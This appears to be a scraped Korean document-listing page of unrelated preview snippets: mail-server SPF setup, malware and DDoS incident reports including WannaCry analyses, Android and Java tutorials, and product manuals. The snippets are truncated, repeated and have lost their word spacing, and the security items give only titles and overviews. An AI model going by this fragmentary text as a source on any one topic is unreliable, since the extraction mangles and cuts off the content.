메일서버등록제(SPF) 인증기능적용안내서 (HP-UX - postfix) OS Mail Server SPF 적용모듈 (Perl 기반) 작성기준 HP-UX 11.11i postfix spf-filter 년 6 월 메일서버등록제(SPF) 인증기능적용안내서 (HP-UX - postfix) OS Mail Server SPF 적용모듈 (Perl 기반) 작성기준 HP-UX 11.11i postfix 2.7.1 spf-filter 1.0 2016 년 6 월 목 차 I. 개요 1 1. SPF( 메일서버등록제) 란? 1 2. SPF 를이용한이메일인증절차 1 II. postfix,

More information

DDoS 공격, 게임계정유출해커, 비트코인등가상화폐노린다 - 13 년 10 월부터 DDoS, 원격제어, 게임계정유출하더니최근암호화폐채굴 - 개요지난 13 년 10 월,Microsoft 社의인터넷익스플로러취약점 (CVE ) 을통해유포되는악성코드가 DDoS

DDoS 공격, 게임계정유출해커, 비트코인등가상화폐노린다 - 13 년 10 월부터 DDoS, 원격제어, 게임계정유출하더니최근암호화폐채굴 - 개요지난 13 년 10 월,Microsoft 社의인터넷익스플로러취약점 (CVE ) 을통해유포되는악성코드가 DDoS DDoS 공격, 게임계정유출해커, 비트코인등가상화폐노린다 - 13 년 10 월부터 DDoS, 원격제어, 게임계정유출하더니최근암호화폐채굴 - 개요지난 13 년 10 월,Microsoft 社의인터넷익스플로러취약점 (CVE-2013-3897) 을통해유포되는악성코드가 DDoS, 원격제어, 게임계정유출기능을하고국내감염 PC 가 2만 8천여대에이르러 KISA 는신속대응한바있다.

More information

Microsoft PowerPoint Android-SDK설치.HelloAndroid(1.0h).pptx

Microsoft PowerPoint Android-SDK설치.HelloAndroid(1.0h).pptx To be an Android Expert 문양세강원대학교 IT 대학컴퓨터학부 Eclipse (IDE) JDK Android SDK with ADT IDE: Integrated Development Environment JDK: Java Development Kit (Java SDK) ADT: Android Development Tools 2 JDK 설치 Eclipse

More information

목차 1. 개요 배경 파일정보 상세분석 SMB 취약점공격흐름 특징적인행위 대응

목차 1. 개요 배경 파일정보 상세분석 SMB 취약점공격흐름 특징적인행위 대응 MALWARE ANALYSIS REPORT WannaCry 랜섬웨어분석 #2 SMB 취약점분석 목차 1. 개요... 3 1.1 배경... 3 1.2 파일정보... 3 2. 상세분석... 4 2.1 SMB 취약점공격흐름... 4 2.2 특징적인행위... 11 3. 대응... 12-2 - 1. 개요 1.1 배경 2017년 5월 17일배포한 WannaCry 분석보고서에도언급되었듯이,

More information

THE TITLE

THE TITLE Android System & Launcher Team 8 목차 Android 1) Android Feature 2) Android Architecture 3) Android 개발방법 4) Android Booting Process Dalvik 1) Dalvik VM 2) Dalvik VM Instance Application 1) Application Package

More information

제11장 프로세스와 쓰레드

제11장 프로세스와 쓰레드 제9장자바쓰레드 9.1 Thread 기초 (1/5) 프로그램 명령어들의연속 (a sequence of instruction) 프로세스 / Thread 실행중인프로그램 (program in execution) 프로세스생성과실행을위한함수들 자바 Thread 2 9.1 Thread 기초 (2/5) 프로세스단위작업의문제점 프로세스생성시오버헤드 컨텍스트스위치오버헤드

More information

1. 제품 개요 AhnLab Policy Center 4.6 for Windows(이하 TOE)는 관리대상 클라이언트 시스템에 설치된 안랩의 안티바이러스 제품인 V3 제품군에 대해 보안정책 설정 및 모니터링 등의 기능을 제공하여 관리대상 클라이언트 시스템에 설치된 V3

1. 제품 개요 AhnLab Policy Center 4.6 for Windows(이하 TOE)는 관리대상 클라이언트 시스템에 설치된 안랩의 안티바이러스 제품인 V3 제품군에 대해 보안정책 설정 및 모니터링 등의 기능을 제공하여 관리대상 클라이언트 시스템에 설치된 V3 CR-15-59 AhnLab Policy Center 4.6 for Windows 인증보고서 인증번호 : ISIS-0631-2015 2015년 7월 IT보안인증사무국 1. 제품 개요 AhnLab Policy Center 4.6 for Windows(이하 TOE)는 관리대상 클라이언트 시스템에 설치된 안랩의 안티바이러스 제품인 V3 제품군에 대해 보안정책 설정

More information

NX1000_Ver1.1

NX1000_Ver1.1 See the world in perfect detail 1 2 3 4 J J KL t P A S M i g s v B 5 6 t P A S M i E PASM Z g s v 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 Chapter 1 25 12 11 10 9 1 2 3 4 5 6 7 8 1 t P A S M i g

More information

1. Windows 설치 (Client 설치 ) 원하는위치에다운받은발송클라이언트압축파일을해제합니다. Step 2. /conf/config.xml 파일수정 conf 폴더에서 config.xml 파일을텍스트에디터를이용하여 Open 합니다. config.xml 파일에서, 아

1. Windows 설치 (Client 설치 ) 원하는위치에다운받은발송클라이언트압축파일을해제합니다. Step 2. /conf/config.xml 파일수정 conf 폴더에서 config.xml 파일을텍스트에디터를이용하여 Open 합니다. config.xml 파일에서, 아 LG U+ SMS/MMS 통합클라이언트 LG U+ SMS/MMS Client Simple Install Manual LG U+ SMS/MMS 통합클라이언트 - 1 - 간단설치매뉴얼 1. Windows 설치 (Client 설치 ) 원하는위치에다운받은발송클라이언트압축파일을해제합니다. Step 2. /conf/config.xml 파일수정 conf 폴더에서 config.xml

More information

< 목차 > 1. 악성코드은닉동향요약 1 2. 홈페이지은닉형악성코드통계 2 - 유포지탐지현황 2 - 대량경유지가탐지된유포지 TOP 악성코드유형별비율 4 - 악성코드취약점유형별비율 4 - 악성코드수집및분석결과 5 - 경유지탐지 업종별비율 악성코드은닉

< 목차 > 1. 악성코드은닉동향요약 1 2. 홈페이지은닉형악성코드통계 2 - 유포지탐지현황 2 - 대량경유지가탐지된유포지 TOP 악성코드유형별비율 4 - 악성코드취약점유형별비율 4 - 악성코드수집및분석결과 5 - 경유지탐지 업종별비율 악성코드은닉 월간악성코드은닉사이트탐지 동향보고서 (2 월 ) 2014. 03. 침해사고대응단 인터넷침해대응본부 < 목차 > 1. 악성코드은닉동향요약 1 2. 홈페이지은닉형악성코드통계 2 - 유포지탐지현황 2 - 대량경유지가탐지된유포지 TOP10 3 - 악성코드유형별비율 4 - 악성코드취약점유형별비율 4 - 악성코드수집및분석결과 5 - 경유지탐지 업종별비율 15 3. 악성코드은닉사례분석

More information

개인정보보호의 이해 및 안전한 관리 - 개인PC 및 스마트폰 개인정보보호-

개인정보보호의  이해 및 안전한 관리 - 개인PC 및 스마트폰 개인정보보호- 개인정보보호의 이해와 안전한 관리 - 안전한 개인정보 관리- 2013. 6. 26 최 윤 형 (한국정보화진흥원) 1 안전한 개인PC 관리방법 목 차 2 안전한 스마트폰 관리방법 1. 안전한 개인PC 관리방법 정보통신 기기의 보안 위협요인 위협요소 웜, 바이러스, 악성코드, DDos공격침입, 네트워크 공격 휴대성, 이동성 오픈 플랫폼 3G, WiFi, Wibro

More information

[ 그림 8-1] XML 을이용한옵션메뉴설정방법 <menu> <item 항목ID" android:title=" 항목제목 "/> </menu> public boolean oncreateoptionsmenu(menu menu) { getme

[ 그림 8-1] XML 을이용한옵션메뉴설정방법 <menu> <item 항목ID android:title= 항목제목 /> </menu> public boolean oncreateoptionsmenu(menu menu) { getme 8 차시메뉴와대화상자 1 학습목표 안드로이드에서메뉴를작성하고사용하는방법을배운다. 안드로이드에서대화상자를만들고사용하는방법을배운다. 2 확인해볼까? 3 메뉴 1) 학습하기 [ 그림 8-1] XML 을이용한옵션메뉴설정방법 public boolean

More information

인터넷 비즈니스의 필수 요소, 트랜잭션 시큐리티 서비스 인터넷 비즈니스는 기업 영리 활동에 있어서 부가적인 서비스가 아닌 사업을 영위해 가는데 중요한 역할을 하고 있습니다. 특히, 인터넷 쇼핑몰, 인터 넷 뱅킹, 사이버 트레이딩, 전자정부서비스, 온라인 게임, 인터넷

인터넷 비즈니스의 필수 요소, 트랜잭션 시큐리티 서비스 인터넷 비즈니스는 기업 영리 활동에 있어서 부가적인 서비스가 아닌 사업을 영위해 가는데 중요한 역할을 하고 있습니다. 특히, 인터넷 쇼핑몰, 인터 넷 뱅킹, 사이버 트레이딩, 전자정부서비스, 온라인 게임, 인터넷 인터넷비즈니스의안심코드, AhnLab Online Security 2.0 멀티브라우저지원! 블루투스키보드지원! 메모리해킹방어! 웹페이지변조및스크린캡처차단! 정보유출걱정없이비즈니스가완성됩니다 보안전용브라우저 AOS Secure Browser 키보드보안서비스 AOS anti-keylogger 온라인 PC 방화벽 AOS firewall 온라인통합방역서비스 AOS

More information

Splentec V-WORM Quick Installation Guide Version: 1.0 Contact Information 올리브텍 주소 : 경기도성남시분당구구미로 11 ( 포인트타운 701호 ) URL: E-M

Splentec V-WORM Quick Installation Guide Version: 1.0 Contact Information 올리브텍 주소 : 경기도성남시분당구구미로 11 ( 포인트타운 701호 ) URL:   E-M Splentec V-WORM Quick Installation Guide Version: 1.0 Contact Information 올리브텍 주소 : 경기도성남시분당구구미로 11 ( 포인트타운 701호 ) URL: http://www.olivetech.co.kr E-Mail: tech@olivetech.co.kr TEL: 031-726-4217 FAX: 031-726-4219

More information

목차 01. 개요 감염경로 워너크립터동작방식 ) 동작과정상세분석 ) 감염증상 ) 파일암호화및복호화방식 안랩대응현황 AhnLab, Inc. All rights reserved.

목차 01. 개요 감염경로 워너크립터동작방식 ) 동작과정상세분석 ) 감염증상 ) 파일암호화및복호화방식 안랩대응현황 AhnLab, Inc. All rights reserved. Trojan/Win32.WannaCryptor 상세분석 안랩시큐리티대응센터 (ASEC) 분석팀 경기도성남시분당구판교역로 220 ( 우 ) 13493 대표전화 : 031-722-8000 팩스 : 031-722-8901 www.ahnlab.com AhnLab, Inc. All rights reserved. 목차 01. 개요... 3 02. 감염경로... 4 03.

More information

2) 활동하기 활동개요 활동과정 [ 예제 10-1]main.xml 1 <LinearLayout xmlns:android="http://schemas.android.com/apk/res/android" 2 xmlns:tools="http://schemas.android.

2) 활동하기 활동개요 활동과정 [ 예제 10-1]main.xml 1 <LinearLayout xmlns:android=http://schemas.android.com/apk/res/android 2 xmlns:tools=http://schemas.android. 10 차시파일처리 1 학습목표 내장메모리의파일을처리하는방법을배운다. SD 카드의파일을처리하는방법을배운다. 2 확인해볼까? 3 내장메모리파일처리 1) 학습하기 [ 그림 10-1] 내장메모리를사용한파일처리 2) 활동하기 활동개요 활동과정 [ 예제 10-1]main.xml 1

More information

<BBE7B0EDB3EBC6AE5FC7E3BAEAB0D4C0D32E687770>

<BBE7B0EDB3EBC6AE5FC7E3BAEAB0D4C0D32E687770> 웹하드서비스를통해생성된 Botnet 을이용한 DDoS 공격피해사례 2009. 12. 본보고서의전부나일부를인용시반드시 [ 자료 : 한국인터넷침해대응센터 (KrCERT)] 를명시하여주시기바랍니다. - 1 - 1. 개요 최근발생하고있는 DDoS 사례들을분석해보면그방식들이점점지능화되고조직화되고있다는것을확인할수있다. 또한 DDoS 공격의목적도과거자기과시또는정치적인이유의단순한목적에서벗어나금전적이득을취하거나경쟁업체의영업을방해하기위한목적으로점차기업화되고있기도하다.

More information

목차 윈도우드라이버 1. 매뉴얼안내 운영체제 (OS) 환경 윈도우드라이버준비 윈도우드라이버설치 Windows XP/Server 2003 에서설치 Serial 또는 Parallel 포트의경우.

목차 윈도우드라이버 1. 매뉴얼안내 운영체제 (OS) 환경 윈도우드라이버준비 윈도우드라이버설치 Windows XP/Server 2003 에서설치 Serial 또는 Parallel 포트의경우. 소프트웨어매뉴얼 윈도우드라이버 Rev. 3.03 SLP-TX220 / TX223 SLP-TX420 / TX423 SLP-TX400 / TX403 SLP-DX220 / DX223 SLP-DX420 / DX423 SLP-DL410 / DL413 SLP-T400 / T403 SLP-T400R / T403R SLP-D220 / D223 SLP-D420 / D423

More information

Interstage5 SOAP서비스 설정 가이드

Interstage5 SOAP서비스 설정 가이드 Interstage 5 Application Server ( Solaris ) SOAP Service Internet Sample Test SOAP Server Application SOAP Client Application CORBA/SOAP Server Gateway CORBA/SOAP Gateway Client INTERSTAGE SOAP Service

More information

SBR-100S User Manual

SBR-100S User Manual ( 1 / 13 ) SBR-100S 모델에 대한 사용자 펌웨어 업그레이드 방법을 안내해 드립니다. SBR-100S 는 신규 펌웨어가 있을시 FOTA(자동업데이트) 기능을 통하여 자동 업그레이드가 되며, 필요시 사용자가 신규 펌웨어를 다운받아 수동으로 업그레이드 할 수 있습니다. 1. 준비하기 1.1 연결 장치 준비 펌웨어 업그레이드를 위해서는 SBR-100S

More information

<32BDBAB8B6C6AEC6F9B1DDC0B6B0C5B7A13130B0E8B8EDBEC8B3BBBCAD2E687770>

<32BDBAB8B6C6AEC6F9B1DDC0B6B0C5B7A13130B0E8B8EDBEC8B3BBBCAD2E687770> 스마트폰 금융거래 10계명 안내서 배 경 금융감독원은 국내의 스마트폰 이용 활성화를 계기로 10.1월 스마트폰 전자금융서비스 안전 대책을 수립하여 금융회사가 안전한 스마트폰 금융서비스를 제공하기 위한 기반을 마련 하였습니다. 더욱 안전한 전자금융거래를 위해서는 서비스를 제공하는 금융회사뿐만 아니라, 금융소비자 스스로도 금융정보 유출, 부정거래 등 전자금융사고

More information

Microsoft PowerPoint - 04-UDP Programming.ppt

Microsoft PowerPoint - 04-UDP Programming.ppt Chapter 4. UDP Dongwon Jeong djeong@kunsan.ac.kr http://ist.kunsan.ac.kr/ Dept. of Informatics & Statistics 목차 UDP 1 1 UDP 개념 자바 UDP 프로그램작성 클라이언트와서버모두 DatagramSocket 클래스로생성 상호간통신은 DatagramPacket 클래스를이용하여

More information

08_spam.hwp

08_spam.hwp 1. 개요 최근국내외에서 E-card 발송을가장한스팸메일로인하여악성코드에감염되는피해가다수보고되었다. 악성코드는메일본문에악의적인 URL을삽입및클릭을유도하는방식으로스팸메일을발송한다. 사용자가스팸메일에포함되어있는악성URL을클릭할경우감염될수있으며, 감염후에는악성코드가감염PC내에저장되어있는메일주소들을추출하여해당주소로동일유형의스팸메일을발송하게된다. 또한, P2P를통한명령전달및추가악성코드다운로드등의악성행위가예상되므로사용자는

More information

PowerPoint 프레젠테이션

PowerPoint 프레젠테이션 B Type 가이드 가지고있는도메인사용 + 인증서구매대행절차 1. 신청하기. 네임서버변경 / 확인 - 네임서버변경 - 네임서버변경확인 3. 인증심사메일에회신하기 - 메일주소확인 - 메일주소변경 - 인증심사메일서명 4. Ver. 015.10.14 가지고있는도메인사용 + 인증서구매대행절차 도메인은가지고있으나인증서가없는경우소유한도메인주소로 를오픈하고인증서는 Qoo10

More information

50_1953.pdf

50_1953.pdf C h a p t e r 02 194 Part Mobile Apps 01 01 02 Chapter 02 195 03 04 196 Part 02 01 02 03 04 Chapter 02 197 05 06 07 08 198 Part 03 01 02 Chapter 02 199 03 04 05 06 200 Part 07 08 09 10 Chapter 02 201 04

More information

ASEC Report VOL.61 January, 2015 ASEC(AhnLab Security Emergency response Center) 은악성코드및보안위협으로부터고객을안전하게지키기위하여보안전문가로구성된 글로벌보안조직입니다. 이리포트는주식회사안랩의 ASEC 에서

ASEC Report VOL.61 January, 2015 ASEC(AhnLab Security Emergency response Center) 은악성코드및보안위협으로부터고객을안전하게지키기위하여보안전문가로구성된 글로벌보안조직입니다. 이리포트는주식회사안랩의 ASEC 에서 Security Trend ASEC Report VOL.61 January, 2015 ASEC Report VOL.61 January, 2015 ASEC(AhnLab Security Emergency response Center) 은악성코드및보안위협으로부터고객을안전하게지키기위하여보안전문가로구성된 글로벌보안조직입니다. 이리포트는주식회사안랩의 ASEC 에서작성하며,

More information

Microsoft Word - windows server 2003 수동설치_non pro support_.doc

Microsoft Word - windows server 2003 수동설치_non pro support_.doc Windows Server 2003 수동 설치 가이드 INDEX 운영체제 설치 준비과정 1 드라이버를 위한 플로피 디스크 작성 2 드라이버를 위한 USB 메모리 작성 7 운영체제 설치 과정 14 Boot Sequence 변경 14 컨트롤러 드라이버 수동 설치 15 운영체제 설치 17 운영체제 설치 준비 과정 Windows Server 2003 에는 기본적으로

More information

PowerPoint Presentation

PowerPoint Presentation 오에스아이소프트코리아세미나세미나 2012 Copyright Copyright 2012 OSIsoft, 2012 OSIsoft, LLC. LLC. PI Coresight and Mobility Presented by Daniel Kim REGIONAL 세미나 SEMINAR 세미나 2012 2012 2 Copyright Copyright 2012 OSIsoft,

More information

JDK이클립스

JDK이클립스 JDK 와이클립스설치 A. JDK 다운로드, 설치및환경설정 지금부터 JDK를다운로드받아설치하고 JDK를윈도우에서활용할수있도록환경을설정하는전과정을소개한다. 다운로드 www.oracle.com 사이트에접속하여 Downloads 메뉴를선택한후 [ 그림 1] 과같이 "Java for Developers" 를클릭한다. [ 그림 1] www.oracle.com 사이트

More information

고객 카드 1588-7278

고객 카드 1588-7278 고객 카드 1588-7278 i 안전을 위한 경고사항 안전을 위한 주의사항 i 헤드유닛 DISP RADIO MEDIA PHONE SEEK TRACK 헤드유닛 FOLDER MUTE SCAN SETUP 스티어링 휠 리모트 컨트롤 + - MODE 기본모드 화면 Radio 모드 변경 RADIO 라디오 주파수 검색하기 SEEK TRACK 라디오 모드 사용하기 저장방송

More information

rmi_박준용_final.PDF

rmi_박준용_final.PDF (RMI) - JSTORM http://wwwjstormpekr (RMI)- Document title: Document file name: Revision number: Issued by: Document Information (RMI)- rmi finaldoc Issue Date: Status:

More information

신종파밍악성코드분석 Bolaven

신종파밍악성코드분석 Bolaven 신종파밍악성코드분석 Bolaven 2013.06.27 개요 지난 1월볼라벤 6차문서에서진화한파밍기법 (= 호스트파일변조 ) 에대해분석및공유를하였다. 6차문서에서는웹을통하여악성코드가유포되는과정과파밍기법의전반적인흐름을알아보았다면, 이번문서에서는파밍기법에서사용되는악성파일의행위에대해중점적으로분석하였다. 파밍기법이란? PC 를악성코드에감염시켜정상홈페이지주소로접속하여도피싱사이트로

More information

SQL Developer Connect to TimesTen 유니원아이앤씨 DB 기술지원팀 2010 년 07 월 28 일 문서정보 프로젝트명 SQL Developer Connect to TimesTen 서브시스템명 버전 1.0 문서명 작성일 작성자

SQL Developer Connect to TimesTen 유니원아이앤씨 DB 기술지원팀 2010 년 07 월 28 일 문서정보 프로젝트명 SQL Developer Connect to TimesTen 서브시스템명 버전 1.0 문서명 작성일 작성자 SQL Developer Connect to TimesTen 유니원아이앤씨 DB 팀 2010 년 07 월 28 일 문서정보 프로젝트명 SQL Developer Connect to TimesTen 서브시스템명 버전 1.0 문서명 작성일 2010-07-28 작성자 김학준 최종수정일 2010-07-28 문서번호 20100728_01_khj 재개정이력 일자내용수정인버전

More information

Windows Server 2012

Windows Server  2012 Windows Server 2012 Shared Nothing Live Migration Shared Nothing Live Migration 은 SMB Live Migration 방식과다른점은 VM 데이터파일의위치입니다. Shared Nothing Live Migration 방식은 Hyper-V 호스트의로컬디스크에 VM 데이터파일이위치합니다. 반면에, SMB

More information

Microsoft PowerPoint SDK설치.HelloAndroid(1.5h).pptx

Microsoft PowerPoint SDK설치.HelloAndroid(1.5h).pptx To be an Android Expert 문양세강원대학교 IT 대학컴퓨터학부 개발환경구조및설치순서 JDK 설치 Eclipse 설치 안드로이드 SDK 설치 ADT(Androd Development Tools) 설치 AVD(Android Virtual Device) 생성 Hello Android! 2 Eclipse (IDE) JDK Android SDK with

More information

C스토어 사용자 매뉴얼

C스토어 사용자 매뉴얼 쪽지 APP 디자인적용가이드 I. 쪽지 APP 소개 2 I. 쪽지 APP 소개 쪽지 APP 을통해쇼핑몰의특정회원또는특정등급의회원그룹에게 알림메시지나마케팅을위한쪽지를발송하실수있습니다. 쪽지 APP의주요기능 1. 전체회원, 특정ID, 특정회원그룹별로쪽지발송가능 2. 발송예약기능 3. 발송한쪽지에대해수신및열람내역조회가능 4. 쇼핑몰페이지에서쪽지함과쪽지알림창제공 3

More information

ASEC REPORT VOL.73 January, 2016 ASEC(AhnLab Security Emergency response Center) 은악성코드및보안위협으로부터고객을안전하게지키기위하여보안전문가로구성된 글로벌보안조직입니다. 이리포트는주식회사안랩의 ASEC 에서

ASEC REPORT VOL.73 January, 2016 ASEC(AhnLab Security Emergency response Center) 은악성코드및보안위협으로부터고객을안전하게지키기위하여보안전문가로구성된 글로벌보안조직입니다. 이리포트는주식회사안랩의 ASEC 에서 Security Trend ASEC REPORT VOL.73 January, 2016 ASEC REPORT VOL.73 January, 2016 ASEC(AhnLab Security Emergency response Center) 은악성코드및보안위협으로부터고객을안전하게지키기위하여보안전문가로구성된 글로벌보안조직입니다. 이리포트는주식회사안랩의 ASEC 에서작성하며,

More information

아이콘의 정의 본 사용자 설명서에서는 다음 아이콘을 사용합니다. 참고 참고는 발생할 수 있는 상황에 대처하는 방법을 알려 주거나 다른 기능과 함께 작동하는 방법에 대한 요령을 제공합니다. 상표 Brother 로고는 Brother Industries, Ltd.의 등록 상

아이콘의 정의 본 사용자 설명서에서는 다음 아이콘을 사용합니다. 참고 참고는 발생할 수 있는 상황에 대처하는 방법을 알려 주거나 다른 기능과 함께 작동하는 방법에 대한 요령을 제공합니다. 상표 Brother 로고는 Brother Industries, Ltd.의 등록 상 Android 용 Brother Image Viewer 설명서 버전 0 KOR 아이콘의 정의 본 사용자 설명서에서는 다음 아이콘을 사용합니다. 참고 참고는 발생할 수 있는 상황에 대처하는 방법을 알려 주거나 다른 기능과 함께 작동하는 방법에 대한 요령을 제공합니다. 상표 Brother 로고는 Brother Industries, Ltd.의 등록 상표입니다. Android는

More information

슬라이드 1

슬라이드 1 핚국산업기술대학교 제 14 강 GUI (III) 이대현교수 학습안내 학습목표 CEGUI 라이브러리를이용하여, 게임메뉴 UI 를구현해본다. 학습내용 CEGUI 레이아웃의로딩및렌더링. OIS 와 CEGUI 의연결. CEGUI 위젯과이벤트의연동. UI 구현 : 하드코딩방식 C++ 코드를이용하여, 코드내에서직접위젯들을생성및설정 CEGUI::PushButton* resumebutton

More information

4S 1차년도 평가 발표자료

4S 1차년도 평가 발표자료 모바일 S/W 프로그래밍 안드로이드개발환경설치 2012.09.05. 오병우 모바일공학과 JDK (Java Development Kit) SE (Standard Edition) 설치순서 Eclipse ADT (Android Development Tool) Plug-in Android SDK (Software Development Kit) SDK Components

More information

Operation-name: 악성행위의종류를말하며, Sending SMS Calling Sending sensitive information Converting data 로분류합니다. Operation-target: 악성행위의목표물을말하며, Premium-rate SM

Operation-name: 악성행위의종류를말하며, Sending SMS Calling Sending sensitive information Converting data 로분류합니다. Operation-target: 악성행위의목표물을말하며, Premium-rate SM 안드로이드악성앱탐지 TUTORIAL 1 소개 안드로이드앱에서추출한여러가지특성을기반으로악성앱을탐지하는샘플모델을소개합니다. * 튜토리얼에서소개되는모델은참고문헌중하나인 Andro-profiler 의작동원리를기반으로하고있습니다. 탐지알고리즘에대한상세한내용은사이트에첨부한논문에서확인하실수있습니다. ** 이번 Data Analysis Challenge 에제공될안드로이드앱은튜토리얼에서사용한데이터셋과수량및파일이다를수있습니다.

More information

안드로이드기본 11 차시어댑터뷰 1 학습목표 어댑터뷰가무엇인지알수있다. 리스트뷰와스피너를사용하여데이터를출력할수있다. 2 확인해볼까? 3 어댑터뷰 1) 학습하기 어댑터뷰 - 1 -

안드로이드기본 11 차시어댑터뷰 1 학습목표 어댑터뷰가무엇인지알수있다. 리스트뷰와스피너를사용하여데이터를출력할수있다. 2 확인해볼까? 3 어댑터뷰 1) 학습하기 어댑터뷰 - 1 - 11 차시어댑터뷰 1 학습목표 어댑터뷰가무엇인지알수있다. 리스트뷰와스피너를사용하여데이터를출력할수있다. 2 확인해볼까? 3 어댑터뷰 1) 학습하기 어댑터뷰 - 1 - ArrayAdapter ArrayAdapter adapter = new ArrayAdapter(this, android.r.layout.simple_list_item_1,

More information

BEA_WebLogic.hwp

BEA_WebLogic.hwp BEA WebLogic Server SSL 설정방법 - Ver 1.0-2008. 6 개정이력 버전개정일개정내용 Ver 1.0 2008 년 6 월 BEA WebLogic Server SSL 설명서최초작성 본문서는정보통신부 한국정보보호진흥원의 보안서버구축가이드 를참고하여작성되었습니다. 본문서내용의무단도용및사용을금합니다. < 목차 > 1. 개인키및 CSR 생성방법

More information

컴퓨터관리2번째시간

컴퓨터관리2번째시간 Company 컴퓨터 관리 참고 자료 PC 운영체제 POST 기능 :, ROM BIOS ( : [F8]) 1. Windows XP Windows XP 사용자 계정 :,,, 강화된 디지털 미디어 지원 기능 : (Windows Movie Maker), CD (Windows Media Player), Windows 홈 네트워크 기능 :, 강화된 시스템 관리 :,

More information

RHEV 2.2 인증서 만료 확인 및 갱신

RHEV 2.2 인증서 만료 확인 및 갱신 2018/09/28 03:56 1/2 목차... 1 인증서 확인... 1 인증서 종류와 확인... 4 RHEVM CA... 5 FQDN 개인 인증서... 5 레드햇 인증서 - 코드 서명 인증서... 6 호스트 인증... 7 참고사항... 8 관련링크... 8 AllThatLinux! - http://allthatlinux.com/dokuwiki/ rhev_2.2_

More information

기존에 Windchill Program 이 설치된 Home Directory 를 선택해준다. 프로그램설치후설치내역을확인해보면 Adobe Acrobat 6.0 Support 내역을확인할수 있다.

기존에 Windchill Program 이 설치된 Home Directory 를 선택해준다. 프로그램설치후설치내역을확인해보면 Adobe Acrobat 6.0 Support 내역을확인할수 있다. PDMLink 에등록된 Office 문서들의 PDF 문서변환기능및 Viewer 기능을알아보자 PDM Link에서지원하는 [Product View Document Support] 기능은 Windows-Base 기반의 Microsoft Office 문서들을 PDMLink용 Viewer인 Product View를통한읽기가가능한 PDF Format 으로변환하는기능이다.

More information

1. 자바프로그램기초 및개발환경 2 장 & 3 장. 자바개발도구 충남대학교 컴퓨터공학과

1. 자바프로그램기초 및개발환경 2 장 & 3 장. 자바개발도구 충남대학교 컴퓨터공학과 1. 자바프로그램기초 및개발환경 2 장 & 3 장. 자바개발도구 충남대학교 컴퓨터공학과 학습내용 1. Java Development Kit(JDK) 2. Java API 3. 자바프로그래밍개발도구 (Eclipse) 4. 자바프로그래밍기초 2 자바를사용하려면무엇이필요한가? 자바프로그래밍개발도구 JDK (Java Development Kit) 다운로드위치 : http://www.oracle.com/technetwork/java/javas

More information